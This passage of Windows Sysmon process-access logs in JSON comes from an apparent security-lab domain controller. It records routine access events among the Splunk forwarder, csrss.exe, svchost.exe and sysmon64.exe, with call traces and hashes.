06:52:01.136","ProcessGuid":"{E2A3D6B1-1111-5F25-0000-001045FA0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","FileVersion":"8.0.2","Description":"Monitor windows event logs","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winevtlog.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4185,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.135\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1111-5F25-0000-001045FA0500}\r\nTargetProcessId: 3068\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.135","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1111-5F25-0000-001045FA0500}","TargetProcessId":"3068","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4186,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.135\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1111-5F25-0000-001045FA0500}\r\nTargetProcessId: 3068\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.135","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1111-5F25-0000-001045FA0500}","TargetProcessId":"3068","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4187,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.135\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.135","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4188,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.135\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.135","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4189,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.135\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.135","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4190,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.135\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.135","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4191,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.135\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.135","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4192,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.135\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.135","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL